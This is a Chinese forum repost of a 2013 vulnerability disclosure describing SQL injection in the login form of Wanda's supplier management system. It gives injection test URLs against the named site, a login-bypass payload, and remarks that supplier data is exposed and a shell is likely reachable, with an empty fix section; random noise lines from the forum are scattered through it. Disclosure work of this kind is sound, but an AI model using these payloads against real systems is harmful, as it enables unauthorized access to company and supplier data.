中国网络渗透测试联盟
标题:
万达供应商系统SQL注射漏洞
[打印本页]
作者:
admin
时间:
2013-3-24 20:16
标题:
万达供应商系统SQL注射漏洞
简要描述:万达某分站sql注入。敏感信息泄露。
5 r* ~7 U' C9 ^1 L) V: e
详细说明:
7 S( k6 \4 z( U' N
万达scm系统登陆框sql注入。
3 V }/ [; i4 `
) z' l$ m1 f! B+ x( h
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
S+ G3 t" x7 S4 f' E6 R" q
% p! a7 o5 z. `) _( _
|2 d! D1 a6 ?! B
500错误。
% M# V6 ?$ N O7 M1 t. j a, H9 X
( ^* s/ H: J$ O
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
- m' t+ s& j, `, B7 j! e+ B' H
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
3 R: H8 g2 H1 y" P
截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
0 j! g+ j9 O1 m+ K' r8 y& u" K/ L
经过分析,登陆验证的过程应该是:
2 n) O. m9 J1 m4 S- |
8 i" P$ a+ ?. b
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
# ?# S# ^9 N- Z6 K% O( W
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
( a" r/ |$ ^& m( ^' Z0 ]
" V \2 h) r: m( e6 L
oracle数据库,存在注入点。@大连万达,你怎么看?
) }! ]7 S: Z! F, A. v
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png
" _2 o0 a: N2 C) p! t7 P, `1 Y
8 J9 P8 X7 Y- j, g1 r: z) ^
系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。
8 N9 s. b2 n3 w- L4 ~: e, f5 R
漏洞证明:
$ s6 c$ @' l p2 z0 A5 `) n
万达scm系统登陆框sql注入。
* H6 b' a- f: ]
% M& G- |! k! p7 Q* I
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
/ r. z3 d( A3 T0 n4 q) o* `- A) b0 H
8 t+ r/ [/ f2 G, H, U p/ z
$ x4 \2 P8 Z1 n
500错误。
# f& r Z5 l+ `; ]) ~* {2 f. u+ a
7 b2 V; M, y* {1 s! X6 S; E: h
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
+ E2 c1 ?' L/ U" y0 F: r
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png
! Q/ O _4 ^2 s! ~1 d2 p+ k& q
5 L* k: U$ u; i" V; ~% m
3 l8 @4 w/ g$ l, k' s
(截图有一点问题)
0 k5 L% p: W2 @$ [7 z1 k: U& N' @
' {6 s# ]. i$ g, G2 s- o6 W
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
9 _9 j% X& T, N4 t# f4 [
2 m! r4 X6 i: {% ?4 U9 X3 s: V
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
6 l* `4 I" n: j. L# J) G. |' [
( ?: U F, I* q2 S. O7 X
绕过:
, C) Y; m3 p& Q" \9 L+ f6 t% E, y
http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1
( ]5 C% i; j; O& f+ t
1 M3 P$ T/ E, T9 j& O: X3 Z" `
" o/ I* g9 @* N0 Y
oracle数据库,存在注入点。@大连万达,你怎么看?
6 U+ l. \) G6 b
系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。
' Z) q' V! e m6 Q9 f g/ x
( L+ H7 G U% b8 O
修复方案:
+ J& y2 M' ]) u# p5 T% E* y
。。。
: ~9 Z8 o5 D/ O- `2 `
( i0 |' M0 q+ k: D
8 \3 a8 v5 O. O9 q' B! }5 C
厂商已经确认
- O& b* G# ~& D& P' o
+ ]3 E# e; R: j" w
[/td][/tr]
- X& `0 h6 v7 Y5 R
[/table]
+ t _8 s( A* l9 F7 w! Z' w
+ e+ h0 _3 o4 N' G
9 n5 Q5 ?: u5 M/ X; [5 x
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2